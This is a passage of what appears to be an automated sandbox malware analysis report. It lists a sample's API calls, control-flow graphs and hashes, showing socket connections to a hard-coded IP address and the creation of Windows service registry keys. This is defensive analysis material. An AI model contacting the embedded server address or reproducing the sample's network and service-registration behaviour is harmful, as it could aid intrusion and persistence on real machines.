                                • CoInitialize.OLE32(00000000,?,?,?,?,?,?,?,?,?,?,?,1000345A), ref: 10002775
                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,1000345A), ref: 10002867
                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,1000345A), ref: 1000286E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressLibraryProc$FreeLoad$Initialize
                                • String ID: CoCreateInstance$CoInitialize$CoUninitialize$FriendlyName$Ole32.dll$Oleaut32.dll$SysFreeString
                                • API String ID: 1826426203-3340630095
                                • Opcode ID: 04da49e3e92bbbdd0f9f0c8e0f8ba39a8ba43a1ac2183a72676083b9aacddba0
                                • Instruction ID: dc083cc7be1034eaa0a0682a4bee7f9366c9f42e82ccc42b4788f43b87a7defe
                                • Opcode Fuzzy Hash: 04da49e3e92bbbdd0f9f0c8e0f8ba39a8ba43a1ac2183a72676083b9aacddba0
                                • Instruction Fuzzy Hash: 56417175E00219BFDB00DBA9CC84EEEB7B9EF88655F148159F604EB254DB31E941CBA0

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 433 10002880-1000292a call 10008310 * 2 wsprintfA call 100073f0
                                APIs
                                • _memset.LIBCMT ref: 10002895
                                • _memset.LIBCMT ref: 100028A8
                                • wsprintfA.USER32 ref: 100028FF
                                  • Part of subcall function 100073F0: _memset.LIBCMT ref: 1000742B
                                  • Part of subcall function 100073F0: _memset.LIBCMT ref: 1000743E
                                  • Part of subcall function 100073F0: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,000003FF,00000000,75921760), ref: 1000744B
                                  • Part of subcall function 100073F0: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 10007462
                                  • Part of subcall function 100073F0: GetProcAddress.KERNEL32(00000000,RegOpenKeyExA), ref: 1000746C
                                  • Part of subcall function 100073F0: GetProcAddress.KERNEL32(00000000,RegEnumValueA), ref: 10007477
                                  • Part of subcall function 100073F0: GetProcAddress.KERNEL32(00000000,RegEnumKeyExA), ref: 1000747F
                                  • Part of subcall function 100073F0: GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 10007487
                                  • Part of subcall function 100073F0: RegOpenKeyExA.KERNEL32(00000000,00000000,00000000,00020019,10002922,?,?,?,000003FF,00000000,75921760), ref: 100074A6
                                  • Part of subcall function 100073F0: FreeLibrary.KERNEL32(00000000,?,?,?,000003FF,00000000,75921760), ref: 1000761C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$_memset$Library$FreeLoadOpenwsprintf
                                • String ID: EM\C$SYST$SYSTEM\CurrentControlSet\Services\%s$\Ser$lSet$ntCo$ntro$s\%s$urre$vice$vices\%s
                                • API String ID: 431278428-1826126930
                                • Opcode ID: b86e2c48ee105d11f782c2cf3456912a50a9555fd57caa8687e8ab0ed391f586
                                • Instruction ID: 6370d920c2687d8dd711321a5e3f9033199a20f216b960cf784de2b62805a47b
                                • Opcode Fuzzy Hash: b86e2c48ee105d11f782c2cf3456912a50a9555fd57caa8687e8ab0ed391f586
                                • Instruction Fuzzy Hash: AB1152B2901218ABDB10CF85CD46FDEBB78FB88B50F24404DF6087B284D6B06644CBB9

                                Control-flow Graph

                                APIs
                                • _memset.LIBCMT ref: 10005628
                                • wsprintfA.USER32 ref: 1000567F
                                • lstrlenA.KERNEL32(\Services\%s,00000000), ref: 1000568E
                                  • Part of subcall function 100076B0: LoadLibraryA.KERNEL32(ADVAPI32.dll,75920F00,\Services\%s,75921760,100090A8,10018BD0,000000FF), ref: 100076DF
                                  • Part of subcall function 100076B0: GetProcAddress.KERNEL32(00000000,RegCreateKeyExA), ref: 100076F6
                                  • Part of subcall function 100076B0: GetProcAddress.KERNEL32(00000000,RegSetValueExA), ref: 10007701
                                  • Part of subcall function 100076B0: GetProcAddress.KERNEL32(00000000,RegDeleteKeyA), ref: 1000770C
                                  • Part of subcall function 100076B0: GetProcAddress.KERNEL32(00000000,RegDeleteValueA), ref: 10007717
                                  • Part of subcall function 100076B0: GetProcAddress.KERNEL32(00000000,RegOpenKeyExA), ref: 10007722
                                  • Part of subcall function 100076B0: GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 1000772C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad_memsetlstrlenwsprintf
                                • String ID: EM\C$SYST$\Ser$\Services\%s$lSet$ntCo$ntro$s\%s$urre$vice$vices\%s
                                • API String ID: 1126013741-1034405897
                                • Opcode ID: aca7259d61ce2b557a9a37e6c53376486ca1e4ed718c5cbe084f3bc0e6149035
                                • Instruction ID: c5e5fb7c00d08460b5fe000e09c1d6a2c50d855d98332ae01f39ea65002d3388
                                • Opcode Fuzzy Hash: aca7259d61ce2b557a9a37e6c53376486ca1e4ed718c5cbe084f3bc0e6149035
                                • Instruction Fuzzy Hash: B6115EB2901228ABDB10DF858D46BDEBB78FB48710F148088F6087B285D6705684CFA9

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 445 7216a0-7216d0 EnterCriticalSection 446 7216d2-7216e1 445->446 447 7216e7-7216ee 445->447 446->447 448 721804-721808 446->448 449 7216f9-7216ff 447->449 452 72180a-72181b call 71f2e0 448->452 453 72181e-721827 448->453 450 721701-721710 449->450 451 721714-72171a 449->451 450->451 454 721712 450->454 451->448 455 721720-721733 451->455 452->453 467 72181d 452->467 457 721835-721844 453->457 458 721829-721832 453->458 454->449 460 721751-721789 GlobalHandle GlobalUnlock call 6f5650 GlobalReAlloc 455->460 461 721735-72174f call 6f5650 GlobalAlloc 455->461 463 721846-721857 call 71f2e0 457->463 464 72185a-721894 LeaveCriticalSection 457->464 458->457 473 72178c-721790 460->473 461->473 463->464 472 721859 463->472 467->453 472->464 474 721792-721799 473->474 475 7217c1-721801 GlobalLock call 8dce70 473->475 476 72179b-7217a9 GlobalHandle GlobalLock 474->476 477 7217af-7217bc LeaveCriticalSection call 6f1e10 474->477 475->448 476->477 477->475
                                APIs
                                • EnterCriticalSection.KERNEL32(?,?,?,?,?,00721FBD,ED5B0DC1,?,?,006F0CD4), ref: 007216B2
                                • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,?,?,00721FBD), ref: 00721746
                                • GlobalHandle.KERNEL32(00000000), ref: 00721758
                                • GlobalUnlock.KERNEL32(?), ref: 00721765
                                • GlobalReAlloc.KERNEL32(?,00000000), ref: 00721783
                                • GlobalHandle.KERNEL32(00000000), ref: 007217A2
                                • GlobalLock.KERNEL32(00000000), ref: 007217A9
                                • LeaveCriticalSection.KERNEL32(?,?,00002002), ref: 007217B6
                                • GlobalLock.KERNEL32(00000000), ref: 007217C5
                                • _memset.LIBCMT ref: 007217EA
                                • LeaveCriticalSection.KERNEL32(?,?,?,?,?,00721FBD), ref: 00721888
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtls.cpp
                                • API String ID: 496899490-1485210865
                                • Opcode ID: 84409dab77d0a67fdb0993b373e7b49af13bbb5dee11a80d08c24675736ae6be
                                • Instruction ID: 2dcb0e5da4e3517961290bbfb052e6047c8cefffc604dd18f9dbcebc50186c66
                                • Opcode Fuzzy Hash: 84409dab77d0a67fdb0993b373e7b49af13bbb5dee11a80d08c24675736ae6be
                                • Instruction Fuzzy Hash: D16108B5E00209EFCB14CF98D495AAEBBB2FF98314F648198E901A7351C735ED41DBA0

                                Control-flow Graph

                                APIs
                                • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 10001C6C
                                • CancelIo.KERNEL32(?), ref: 10001C72
                                • InterlockedExchange.KERNEL32(?,00000000), ref: 10001C7E
                                • closesocket.WS2_32(?), ref: 10001C88
                                • SetEvent.KERNEL32(?), ref: 10001C92
                                • ResetEvent.KERNEL32(?), ref: 10001CA3
                                • socket.WS2_32(00000002,00000001,00000006), ref: 10001CB2
                                • gethostbyname.WS2_32(?), ref: 10001CCF
                                • htons.WS2_32(?), ref: 10001CE9
                                • connect.WS2_32(?,?,00000010), ref: 10001D0A
                                • setsockopt.WS2_32(?,0000FFFF,00000008,?,00000004), ref: 10001D2D
                                • WSAIoctl.WS2_32(?,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 10001D5F
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Eventsetsockopt$CancelExchangeInterlockedIoctlResetclosesocketconnectgethostbynamehtonssocket
                                • String ID:
                                • API String ID: 4281462294-0
                                • Opcode ID: 4791aedbae1beff0060ce568bc960496134b275eb6c8de5caa4e11d0a5a7419b
                                • Instruction ID: b7469757f00a1d7b0cbd7e4bce753fb1fb6ff2cafe6e79ff9598756b689fa32e
                                • Opcode Fuzzy Hash: 4791aedbae1beff0060ce568bc960496134b275eb6c8de5caa4e11d0a5a7419b
                                • Instruction Fuzzy Hash: F7416D75640315EFE310DFA8CC85FAABBB8EB49751F108609F6559B2D0D7B2A940CBA0

                                Control-flow Graph

                                APIs
                                • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 10001B02
                                • _memset.LIBCMT ref: 10001B23
                                • recv.WS2_32(?,?,00002000,00000000), ref: 10001B3D
                                • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 10001BAA
                                • CancelIo.KERNEL32(?), ref: 10001BB4
                                • InterlockedExchange.KERNEL32(00000000,00000000), ref: 10001BC0
                                • closesocket.WS2_32(?), ref: 10001BCA
                                • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 10001BF1
                                • CancelIo.KERNEL32(?), ref: 10001BFB
                                • InterlockedExchange.KERNEL32(?,00000000), ref: 10001C07
                                • closesocket.WS2_32(?), ref: 10001C11
                                • SetEvent.KERNEL32(?), ref: 10001C1B
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: CancelExchangeInterlockedclosesocketsetsockopt$Event_memsetrecvselect
                                • String ID:
                                • API String ID: 2628485285-0
                                • Opcode ID: 57f138af383dc6d5c85f80a4e3a5a76184d988a1fc52c91ca8937e3f29151624
                                • Instruction ID: a9e7d163a2cdd50a6bbd21d57433b265c2b26d69c0499f1f7f4acbaf6204130b
                                • Opcode Fuzzy Hash: 57f138af383dc6d5c85f80a4e3a5a76184d988a1fc52c91ca8937e3f29151624
                                • Instruction Fuzzy Hash: F7414375240204ABEB14CFA8CCC9BDA7768EF45751F008294FB159B2D6EBB2D984CB91
                                APIs
                                • KiUserCallbackDispatcher.NTDLL(0000000B), ref: 0071FAFD
                                • GetSystemMetrics.USER32(0000000C), ref: 0071FB0B
                                • GetSystemMetrics.USER32(00000002), ref: 0071FB19
                                • GetSystemMetrics.USER32(00000003), ref: 0071FB29
                                • GetDC.USER32(00000000), ref: 0071FB39
                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 0071FB5F
                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0071FB71
                                • ReleaseDC.USER32(00000000,00000000), ref: 0071FB83
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp, xrefs: 0071FB4A
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: MetricsSystem$CapsDeviceMessage$CallbackDispatcherPeekPostQuitReleaseUser
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
                                • API String ID: 1498107558-698929750
                                • Opcode ID: 5f86b488c456e7ad93088532f86ef7fc3244bf510bba4cc8938dadcdc44d9f33
                                • Instruction ID: c4816784c68671821918840883b8353ac725e61782cfdbeae72756c5fbc277fc
                                • Opcode Fuzzy Hash: 5f86b488c456e7ad93088532f86ef7fc3244bf510bba4cc8938dadcdc44d9f33
                                • Instruction Fuzzy Hash: 64116A75A04308EFEB209FA0DD09B6DBB74FB44301F104068EA099B291D7748E82DF56
                                APIs
                                • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 007E55FA
                                • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 007E5605
                                • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 007E5610
                                • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 007E5646
                                  • Part of subcall function 00717D80: std::_Generic_error_category::_Generic_error_category.LIBCPMTD ref: 00717D8C
                                • CreateCompatibleDC.GDI32(00000000), ref: 007E5703
                                • CreateCompatibleDC.GDI32(00000000), ref: 007E5710
                                • std::_Fac_node::_Fac_node.LIBCPMTD ref: 007E575D
                                • std::_Fac_node::_Fac_node.LIBCPMTD ref: 007E5777
                                • std::_Fac_node::_Fac_node.LIBCPMTD ref: 007E5791
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::_$Fac_nodeFac_node::_Iterator_baseIterator_base::_$CompatibleCreateProcessorVirtual$Concurrency::Generic_error_categoryGeneric_error_category::_RootRoot::
                                • String ID:
                                • API String ID: 2686802488-0
                                • Opcode ID: 7e4984173249c3896b833c74f54470fbb1077e39939a5d308495dabfe114524e
                                • Instruction ID: 1d4183e9d8ba2060be38ae5ce67ea9e20365f35db3a5b06aa207e0b83a1c9017
                                • Opcode Fuzzy Hash: 7e4984173249c3896b833c74f54470fbb1077e39939a5d308495dabfe114524e
                                • Instruction Fuzzy Hash: 4091E874A00208DFDB18DF94C995BADBBB1FF48308F148199D9156F3E2CB75A846CB85
                                APIs
                                • _memset.LIBCMT ref: 100038B5
                                • _memset.LIBCMT ref: 100038DA
                                • _memset.LIBCMT ref: 100038EF
                                • _strcspn.LIBCMT ref: 10003910
                                • _strcspn.LIBCMT ref: 10003929
                                • lstrcatA.KERNEL32(?,?), ref: 10003958
                                • lstrcatA.KERNEL32(?,119.91.152.151,?,00000000,000000FF), ref: 10003984
                                • GetTickCount.KERNEL32 ref: 100039C8
                                • GetTickCount.KERNEL32 ref: 100039E4
                                • WaitForSingleObject.KERNEL32(?,00000064,?,?,?,?,?,00000000), ref: 10003A3C
                                • Sleep.KERNEL32(000001F4,?,?,?,?,?,00000000), ref: 10003A49
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: _memset$CountTick_strcspnlstrcat$ObjectSingleSleepWait
                                • String ID:
                                • API String ID: 3214752699-0
                                • Opcode ID: b36ca3a806435c05f7a4fc6cbbcb19707d1a05574fb2b25c616d032d0e55227e
                                • Instruction ID: 4bd0477d13b5867919165b71e2e447e213bb3c461a06ccccac1cc9df8c3142a0
                                • Opcode Fuzzy Hash: b36ca3a806435c05f7a4fc6cbbcb19707d1a05574fb2b25c616d032d0e55227e
                                • Instruction Fuzzy Hash: 304109368042599AEB12DB60CD91BEF77BDEF553C0F048099E5496B14AEB32AF08CB51
                                APIs
                                • ___set_flsgetvalue.LIBCMT ref: 10009410
                                • __calloc_crt.LIBCMT ref: 1000941C
                                • __getptd.LIBCMT ref: 10009429
                                • CreateThread.KERNEL32(?,10007922,10009386,00000000,75920F00,7555B5F0), ref: 10009460
                                • GetLastError.KERNEL32(?,10007922,?,?,100078A0,?,?,?), ref: 1000946A
                                • _free.LIBCMT ref: 10009473
                                • __dosmaperr.LIBCMT ref: 1000947E
                                  • Part of subcall function 1000BF03: __getptd_noexit.LIBCMT ref: 1000BF03
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                • String ID:
                                • API String ID: 155776804-0
                                • Opcode ID: 18c82fb9af598c5c2b4c9a16deb9cc0dbbfe28eabdeba998376896722fa87a2e
                                • Instruction ID: 33c1190ffc053305488d3cc5d707292ea8a7e67e864ba6635cf09b6601144f6c
                                • Opcode Fuzzy Hash: 18c82fb9af598c5c2b4c9a16deb9cc0dbbfe28eabdeba998376896722fa87a2e
                                • Instruction Fuzzy Hash: 9F11A536104B46AFF711EFA59C41D9B37D8EF843F4B114129FA5497156DB71E8028BA0
                                APIs
                                • ___set_flsgetvalue.LIBCMT ref: 1000938C
                                  • Part of subcall function 1000B151: TlsGetValue.KERNEL32(7555B5F0,1000B2AA), ref: 1000B15A
                                  • Part of subcall function 1000B151: DecodePointer.KERNEL32 ref: 1000B16C
                                  • Part of subcall function 1000B151: TlsSetValue.KERNEL32(00000000), ref: 1000B17B
                                • ___fls_getvalue@4.LIBCMT ref: 10009397
                                  • Part of subcall function 1000B131: TlsGetValue.KERNEL32(?,?,1000939C,00000000), ref: 1000B13F
                                • ___fls_setvalue@8.LIBCMT ref: 100093AA
                                  • Part of subcall function 1000B185: DecodePointer.KERNEL32(?,?,?,100093AF,00000000,?,00000000), ref: 1000B196
                                • GetLastError.KERNEL32(00000000,?,00000000), ref: 100093B3
                                • ExitThread.KERNEL32 ref: 100093BA
                                • GetCurrentThreadId.KERNEL32 ref: 100093C0
                                • __freefls@4.LIBCMT ref: 100093E0
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                • String ID:
                                • API String ID: 2383549826-0
                                • Opcode ID: c99a1a261391bcf314a294acfd4a6af97202cd04aeac042d814c207d764a3763
                                • Instruction ID: baf93fa91ffd5f378b061414a9dabfb993cbddfcf3cee2149b0ea0b0312b0feb
                                • Opcode Fuzzy Hash: c99a1a261391bcf314a294acfd4a6af97202cd04aeac042d814c207d764a3763
                                • Instruction Fuzzy Hash: C2F09078500A40FBE704EFB4C85984E7BE9EF482C0765C418F8049B21ADB35E942CB90
                                APIs
                                • IsBadReadPtr.KERNEL32(?,00000014), ref: 006D12A0
                                • _realloc.LIBCMTD ref: 006D12E6
                                  • Part of subcall function 008DCEF0: __realloc_dbg.LIBCMTD ref: 008DCF04
                                • IsBadReadPtr.KERNEL32(?,00000014), ref: 006D1372
                                • SetLastError.KERNEL32(0000007F), ref: 006D13A6
                                • SetLastError.KERNEL32(0000007E), ref: 006D13B6
                                • SetLastError.KERNEL32(0000000E), ref: 006D13D3
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$Read$__realloc_dbg_realloc
                                • String ID:
                                • API String ID: 792278448-0
                                • Opcode ID: 9412520b8dc4aa33cbc2ecbadb301f60dd85b01f074e11047e3a53211c9b24c4
                                • Instruction ID: 812966833222e734c9ab064dab1e8a6dee50ccc658608499e35473ce746b7444
                                • Opcode Fuzzy Hash: 9412520b8dc4aa33cbc2ecbadb301f60dd85b01f074e11047e3a53211c9b24c4
                                • Instruction Fuzzy Hash: BD417071B04205ABDB20CFA9DC80A6AF3FAFF85314B15456AE849DB751E6B1F902CB50
                                APIs
                                • _malloc.LIBCMT ref: 100030CD
                                  • Part of subcall function 10008730: __FF_MSGBANNER.LIBCMT ref: 10008749
                                  • Part of subcall function 10008730: __NMSG_WRITE.LIBCMT ref: 10008750
                                  • Part of subcall function 10008730: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,1000F48D,0000000C,00000001,0000000C,?,1000BA5C,00000018,10018E90,0000000C,1000BAEC), ref: 10008775
                                • GetIfTable.IPHLPAPI(00000000,100033A9,00000000), ref: 100030F4
                                • _free.LIBCMT ref: 100030FF
                                • _malloc.LIBCMT ref: 10003108
                                • GetIfTable.IPHLPAPI(00000000,00000360,00000000), ref: 1000311D
                                • _free.LIBCMT ref: 10003145
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Table_free_malloc$AllocHeap
                                • String ID:
                                • API String ID: 2403264916-0
                                • Opcode ID: d1eb77a39018b00429f1a8e0b34b3005b7702966a55608bb2b04351e317dd61a
                                • Instruction ID: a2089b64117daa44326389c6c20940419830ad27d1c22f29b4cc0cd55350ad8e
                                • Opcode Fuzzy Hash: d1eb77a39018b00429f1a8e0b34b3005b7702966a55608bb2b04351e317dd61a
                                • Instruction Fuzzy Hash: 8D01D836A0151863E226C559AD02BDF739DDF846D0F018565FE089B209EAA6EF4187E2
